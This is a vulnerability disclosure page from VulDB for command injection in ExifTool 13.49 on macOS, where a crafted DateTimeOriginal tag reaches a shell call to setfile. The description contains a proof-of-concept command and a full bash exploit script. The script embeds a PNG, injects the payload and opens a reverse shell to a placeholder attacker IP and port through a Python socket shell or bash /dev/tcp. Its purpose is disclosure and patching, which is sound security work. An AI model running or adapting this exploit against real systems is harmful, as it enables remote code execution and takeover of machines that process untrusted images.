提出 #758146: Exiftool 13.49 Arbitrary Code Execution情報

タイトル	Exiftool 13.49 Arbitrary Code Execution
説明	Here is the patch https://github.com/exiftool/exiftool/commit/e9609a9bcc0d32bd252a709a562fb822d6dd86f7#diff-4e4ae7685b587fd469108c25437f7d9ad6e3defc6394d8681b38e36863467baaR416 POC: Only for MacOS due to /usr/bin/setfile used which is part of a toolchain in Mac and also gated by check for OS 'darwin' Use any png/jpg and name it evil_benign.jpg ``` ../../exiftool -n -DateTimeOriginal="2026:02:07'\$(touch /tmp/exiftool_poc)'" ./evil_benign.jpg cp evil_benign.jpg pwn.jpg; ../../exiftool -n -tagsFromFile evil_benign.jpg "-FileCreateDate<DateTimeOriginal" pwn.jpg ``` If this works, you should see `/tmp/exiftool_poc` I was able to write a script to create a minimal png file and run this and get back a reverse shell https://www.youtube.com/watch?v=akk0vmilfb4 to run: "DEBUG=1 ./poc.sh" Not sure if you will want to process this but I have contacted MITRE for a while now but there are no response from them (my first time so i am not sure what the lead time is) ```sh #!/usr/bin/env bash DEBUG="${DEBUG:-0}" dbg() { [[ "$DEBUG" == "1" ]] && echo -e "$@" } POC_FILEPATH="/tmp/POC1" # we cannot use python3 -m http.server 8080 wsince "-" is actually filtered out # Recall teh regex: # KEEP IN MIND # $val =~ s{(\d{4}):(\d{2}):(\d{2})}{$2/$3/$1}; # reformat for setfile # $cmd = "/usr/bin/setfile -d '${val}' '${f}'"; KALI_IP="<ATTACKER IP>" KALI_PORT="<ATTACKER PORT>" PAYLOAD="'; touch ${POC_FILEPATH}; (echo 'import socket,subprocess,os;s=socket.socket();s.connect((\"${KALI_IP}\",${KALI_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\"])' \| python3 &); #" PAYLOAD="'; touch ${POC_FILEPATH}; (bash </dev/tcp/${KALI_IP}/${KALI_PORT} 1>&0 2>&0 &); #" PATH_TO_EXIFTOOL="../exiftool" # Check if pocfile exists. if yes, delete it if [[ -f $POC_FILEPATH ]]; then rm -f $POC_FILEPATH; fi ################################################################################################################ ####################################### CREATE PNG OR JUST IMPORT AN EXISTING ONE ############################## ################################################################################################################ dbg "\t[+] Creating benign PNG file" out="${1:-benign.png}" # 1x1 transparent PNG { printf '\x89\x50\x4E\x47\x0D\x0A\x1A\x0A' printf '\x00\x00\x00\x0D\x49\x48\x44\x52\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89' printf '\x00\x00\x00\x0A\x49\x44\x41\x54\x78\x9C\x63\x00\x01\x00\x00\x05\x00\x01\x0D\x0A\x2D\xB4' printf '\x00\x00\x00\x00\x49\x45\x4E\x44\xAE\x42\x60\x82' } > "$out" ################################################################################################################ ####################################### ADD PAYLOAD TAG THEN TRIGGER CODE PATH ################################# ################################################################################################################ dbg "\t[+] Setting Payload" dbg "\t[+] Payload : ${PAYLOAD}" cp ./benign.png ./evil.png dbg "\t[+] Adding tag to evil.png" $PATH_TO_EXIFTOOL -n -DateTimeOriginal="2026:02:07 ${PAYLOAD}" -overwrite_original ./evil.png #$PATH_TO_EXIFTOOL -n -DateTimeOriginal="2026:02:07 ${PAYLOAD}" -overwrite_original ./evil.png > /dev/null dbg "\t[+] Triggering Vulnerability when Copying Tag to FileCreateDate" #$PATH_TO_EXIFTOOL -n -overwrite_original -tagsFromFile ./evil.png "-FileCreateDate<DateTimeOriginal" benign.png > /dev/null $PATH_TO_EXIFTOOL -n -overwrite_original -tagsFromFile ./evil.png "-FileCreateDate<DateTimeOriginal" benign.png dbg "\t[] Bytes in benign.png" [[ "$DEBUG" == "1" ]] && xxd ./benign.png dbg "\t[] Bytes in evil.png" [[ "$DEBUG" == "1" ]] && xxd ./evil.png dbg "[+] Removing artefacts" rm evil.png* benign.png ################################################################################################################ ####################################### CHECK FOR SUCCESSFUL EXPLOITATION ###################################### ################################################################################################################ if [[ -f $POC_FILEPATH ]]; then dbg "[+] Exploit Completed" else dbg "[-] Something went wrong. This should work for Exiftool v13.49 and below" fi ```
ユーザー	owl4444 (UID 95583)
送信	2026年02月14日 06:49 (4 月 ago)
モデレーション	2026年02月24日 10:53 (10 days later)
ステータス	承諾済み
VulDBエントリ	347528 [exiftool 迄 13.49 上 macOS PNG File Parser MacOS.pm SetMacOSTags DateTimeOriginal 特権昇格]
ポイント	17

◂ 前概要次 ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!